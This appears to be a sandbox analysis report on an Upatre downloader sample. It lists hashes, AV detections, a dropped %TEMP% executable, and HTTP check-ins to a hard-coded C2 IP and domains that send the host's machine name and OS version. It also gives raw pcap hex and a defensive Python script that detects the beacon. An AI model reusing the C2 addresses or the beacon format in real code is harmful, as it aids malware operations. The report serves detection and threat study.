Field | Value |
---|---|
Analysis Date | 2016-01-25 14:24:03 |
MD5 | c47a93fb1c893adb19a4b45c7c876bba |
SHA1 | 62008e536a2ef64a5c3931e3222382a0fa62cfe1 |
Static Details:

Field | Value |
---|---|
File type | PE32 executable for MS Windows (GUI) Intel 80386 |
Timestamp (PE header) | 2014-04-23 07:37:18 |

Section | Size (bytes) | MD5 | SHA1 |
---|---|---|---|
.code | 5632 | 82a9707e96ce2db008581e6b8b46f4d4 | 52168e36596f478f20421259da0a9af20cbb26e8 |
.DATA | 6656 | 5c85347a3a4dc6e6f94b0952c08a1670 | af070283074f0822d90d26c4627324b73a15fa60 |
RSRC | 31232 | 929215dee27be36035d65e961b2300f9 | 36baec88b3f6d76f1fe2fd00536bd5c725046ce5 |
.r | 0 | d41d8cd98f00b204e9800998ecf8427e | da39a3ee5e6b4b0d3255bfef95601890afd80709 |

Two things worth noting before reading the detections: the section names (.code, .DATA, RSRC, .r) are not what a standard compiler and linker emit (.text, .data, .rsrc), and the zero-length .r section's hashes are simply the MD5 and SHA1 of empty input. Both are typical of a packed or crypted dropper and are usable triage signals on their own. The PE timestamp is attacker-controlled and should not be trusted as a build date.

AV detections: 29 of the 30 engines flag the sample. The consensus family is Upatre, a small downloader; ESET and Fortinet use the name Waski for the same family.

AV engine | Detection |
---|---|
CA (E-Trust Ino) | Win32/Upatre.FS |
Rising | No Virus |
Mcafee | Upatre-FAAC!C47A93FB1C89 |
Avira (antivir) | TR/Crypt.EPACK.miod.1 |
Twister | TrojanDldr.Upatre.dik.wkid |
Ad-Aware | Trojan.GenericKD.1949202 |
Alwil (avast) | Kryptik-PAB [Trj] |
Eset (nod32) | Win32/TrojanDownloader.Waski.A |
Grisoft (avg) | Generic_s.DZA |
Symantec | Trojan.Asprox.B |
Fortinet | W32/Waski.F!tr |
BitDefender | Trojan.GenericKD.1949202 |
K7 | Trojan ( 004aff101 ) |
Microsoft Security Essentials | TrojanDownloader:Win32/Upatre.AK |
MicroWorld (escan) | Trojan.GenericKD.1949202 |
MalwareBytes | Trojan.Upatre |
Authentium | W32/Trojan.RLAO-7427 |
Frisk (f-prot) | W32/Trojan3.LTK |
Ikarus | Trojan-Downloader.Win32.Upatre |
Emsisoft | Trojan.GenericKD.1949202 |
Zillya! | Backdoor.CPEX.Win32.29943 |
Kaspersky | Trojan.Win32.Generic |
Trend Micro | TROJ_UP.FF6B08CD |
CAT (quickheal) | TrojanDownloader.Upatre.AA3 |
VirusBlokAda (vba32) | TrojanDownloader.Upatre |
BullGuard | Trojan.GenericKD.1949202 |
Arcabit (arcavir) | Trojan.GenericKD.1949202 |
ClamAV | Win.Trojan.Upatre-5766 |
Dr. Web | Trojan.Upatre.112 |
F-Secure | Trojan-Downloader:W32/Upatre.J |
Runtime Details:
Process
↳ C:\malware.exe

Event | Detail |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe |
Creates File | PIPE\wkssvc |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe" |

The submitted sample behaves as a stage-one dropper: it writes vdigj.exe into the user's %TEMP% directory and launches it. All name resolution and network traffic in this report is attributed to that child process, not to malware.exe itself.
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe"

Event | Detail |
---|---|
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Winsock DNS | adapob.medianewsonline.com |
Winsock DNS | 188.165.214.6 |
Winsock DNS | kajaaninkalevalaiset.com |

Caveat when turning these rows into indicators: the three index.dat files, the "c:!...!" mutexes and WininetConnectionMutex are WinINet's own cache, cookie and history housekeeping, created by any process that issues HTTP requests through that API (the proxy-setting registry reads fit the same picture), and \Device\Afd\Endpoint is just a Winsock socket being opened. None of them identify this family. The sample-specific artifacts are the executable dropped into %TEMP%, the two domain names, and the IP:port contacted in the Network Details.
Network Details:

Type | Detail |
---|---|
DNS | adapob.medianewsonline.com Type: A ➝ 127.0.0.1 |
DNS | kajaaninkalevalaiset.com Type: A (no address recorded in the report) |
HTTP GET | http://188.165.214.6:19904/2910us1/COMPUTER-XXXXXX/0/51-SP3/0/ User-Agent: myupdate |
HTTP GET | http://188.165.214.6:19904/2910us1/COMPUTER-XXXXXX/1/0/0/ User-Agent: myupdate |
Flows TCP | 192.168.1.1:1031 ➝ 188.165.214.6:19904 |
Flows TCP | 192.168.1.1:1031 ➝ 188.165.214.6:19904 |
Flows TCP | 192.168.1.1:1032 ➝ 188.165.214.6:19904 |

adapob.medianewsonline.com answered with 127.0.0.1 at analysis time, which usually means the name had been sinkholed or parked, so the only live check-in observed is to the hard-coded 188.165.214.6 on the non-standard port 19904. Both GETs carry the fixed User-Agent "myupdate" and the same five-segment path, differing only in the segments after the machine name (0/51-SP3/0, then 1/0/0); the 51-SP3 value is consistent with the Windows XP SP3 (NT 5.1) sandbox that the file paths above indicate. The User-Agent string together with that path shape is a far more durable detection than the IP and port, which a campaign can rotate at will.
Raw Pcap

```
0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d   GET /2910us1/COM
0x00000010 (00016) 50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032) 312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048) 310d0a55 7365722d 4167656e 743a206d   1..User-Agent: m
0x00000040 (00064) 79757064 6174650d 0a486f73 743a2031   yupdate..Host: 1
0x00000050 (00080) 38382e31 36352e32 31342e36 3a313939   88.165.214.6:199
0x00000060 (00096) 30340d0a 43616368 652d436f 6e74726f   04..Cache-Contro
0x00000070 (00112) 6c3a206e 6f2d6361 6368650d 0a0d0a     l: no-cache....

0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d   GET /2910us1/COM
0x00000010 (00016) 50555445 522d5858 58585858 2f312f30   PUTER-XXXXXX/1/0
0x00000020 (00032) 2f302f20 48545450 2f312e31 0d0a5573   /0/ HTTP/1.1..Us
0x00000030 (00048) 65722d41 67656e74 3a206d79 75706461   er-Agent: myupda
0x00000040 (00064) 74650d0a 486f7374 3a203138 382e3136   te..Host: 188.16
0x00000050 (00080) 352e3231 342e363a 31393930 340d0a43   5.214.6:19904..C
0x00000060 (00096) 61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000070 (00112) 2d636163 68650d0a 0d0a650d 0a0d0a     -cache....e....
```

Each dump is 127 bytes and restarts at offset 0 for the second request. Both requests consist of only three headers (User-Agent, Host, Cache-Control: no-cache) with no Accept, Accept-Language or Connection header, which is itself unlike any browser. The second capture carries five extra bytes (65 0d 0a 0d 0a, i.e. "e" followed by two CRLFs) after the blank line that terminates the headers.
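The following is an added example and is not part of the original report or of the sandbox's own tooling. It rebuilds the two requests from the Raw Pcap hex dump above, parses them as HTTP, and scores each one against the beacon traits the report shows: the fixed User-Agent "myupdate", the five-segment check-in path, a bare IP with a non-standard port in the Host header, and the absence of an Accept header. The hex dump text is copied from this page; the BENIGN_REQUEST bytes, the regex and the function names are constructed for the example, and the report does not document what the path segments mean beyond the machine name, so they are kept as opaque strings.

```python
import re
from dataclasses import dataclass

# Hex dump copied from the Raw Pcap section of this report: two client
# requests, each dump restarting at offset 0x00000000.
RAW_PCAP_DUMP = """\
0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d   GET /2910us1/COM
0x00000010 (00016) 50555445 522d5858 58585858 2f302f35   PUTER-XXXXXX/0/5
0x00000020 (00032) 312d5350 332f302f 20485454 502f312e   1-SP3/0/ HTTP/1.
0x00000030 (00048) 310d0a55 7365722d 4167656e 743a206d   1..User-Agent: m
0x00000040 (00064) 79757064 6174650d 0a486f73 743a2031   yupdate..Host: 1
0x00000050 (00080) 38382e31 36352e32 31342e36 3a313939   88.165.214.6:199
0x00000060 (00096) 30340d0a 43616368 652d436f 6e74726f   04..Cache-Contro
0x00000070 (00112) 6c3a206e 6f2d6361 6368650d 0a0d0a     l: no-cache....
0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d   GET /2910us1/COM
0x00000010 (00016) 50555445 522d5858 58585858 2f312f30   PUTER-XXXXXX/1/0
0x00000020 (00032) 2f302f20 48545450 2f312e31 0d0a5573   /0/ HTTP/1.1..Us
0x00000030 (00048) 65722d41 67656e74 3a206d79 75706461   er-Agent: myupda
0x00000040 (00064) 74650d0a 486f7374 3a203138 382e3136   te..Host: 188.16
0x00000050 (00080) 352e3231 342e363a 31393930 340d0a43   5.214.6:19904..C
0x00000060 (00096) 61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000070 (00112) 2d636163 68650d0a 0d0a650d 0a0d0a     -cache....e....
"""

# Constructed browser-style request used as a negative control (not from the report).
BENIGN_REQUEST = (b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
                  b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")

# One dump line: hex offset, decimal offset, then at most four hex groups.
# Capping at four groups stops the ASCII column (which can look like hex,
# e.g. "88.165") from being read as data on full lines.
HEX_LINE = re.compile(r"0x([0-9a-f]{8}) \((\d+)\)((?: [0-9a-f]{2,8}){1,4})")


def parse_hexdump(text):
    """Return one bytes object per dump; a new dump begins when the offset resets to 0."""
    records, current = [], bytearray()
    for m in HEX_LINE.finditer(text):
        offset = int(m.group(1), 16)
        if offset == 0 and current:
            records.append(bytes(current))
            current = bytearray()
        if offset != len(current) or int(m.group(2)) != offset:
            raise ValueError(f"offset 0x{offset:08x} is not contiguous with previous bytes")
        current += bytes.fromhex(m.group(3).replace(" ", ""))
    if current:
        records.append(bytes(current))
    return records


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict      # header names lower-cased
    trailing: bytes    # anything after the blank line that ends the headers
    raw: bytes


def parse_http_request(data):
    """Split a captured client request into request line, headers and leftover bytes."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    lines = head.decode("ascii").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers, rest, data)


# Path shape of both check-ins in the report: /<token>/<machine name>/<n>/<field>/<n>/
CHECKIN_PATH = re.compile(r"^/([A-Za-z0-9]+)/([^/]+)/(\d+)/([^/]*)/(\d+)/$")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def checkin_indicators(req):
    """Compare one request against the beacon traits visible in this report.
    Segment 2 matches the sandbox machine name; the other segments are not
    documented by the report and are returned as opaque strings."""
    m = CHECKIN_PATH.match(req.target)
    host, _, port = req.headers.get("host", "").partition(":")
    return {
        "user_agent_myupdate": req.headers.get("user-agent") == "myupdate",
        "checkin_path_shape": m is not None,
        "bare_ip_nonstandard_port": bool(IPV4.fullmatch(host))
                                    and port.isdigit() and port not in ("80", "443"),
        "no_accept_header": "accept" not in req.headers,  # browsers normally send one
        "segments": list(m.groups()) if m else None,
    }


def is_upatre_checkin(req):
    """Fire only on the two traits that survive a change of C2 address."""
    ind = checkin_indicators(req)
    return ind["user_agent_myupdate"] and ind["checkin_path_shape"]


if __name__ == "__main__":
    for req in map(parse_http_request, parse_hexdump(RAW_PCAP_DUMP)):
        verdict = "UPATRE CHECK-IN" if is_upatre_checkin(req) else "no match"
        print(req.method, req.target, "->", verdict)
        print("  segments:", checkin_indicators(req)["segments"], "trailing:", req.trailing)
    print("benign control:", is_upatre_checkin(parse_http_request(BENIGN_REQUEST)))
```

Run stand-alone it reports both captured requests as check-ins, shows the five trailing bytes on the second one, and leaves the constructed browser request unflagged. The two traits is_upatre_checkin keys on (the User-Agent string and the path shape) translate directly into a proxy-log search or an IDS rule, whereas the IP and port in the Host header are the first things a campaign rotates, so they are reported but not required for a match.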
Strings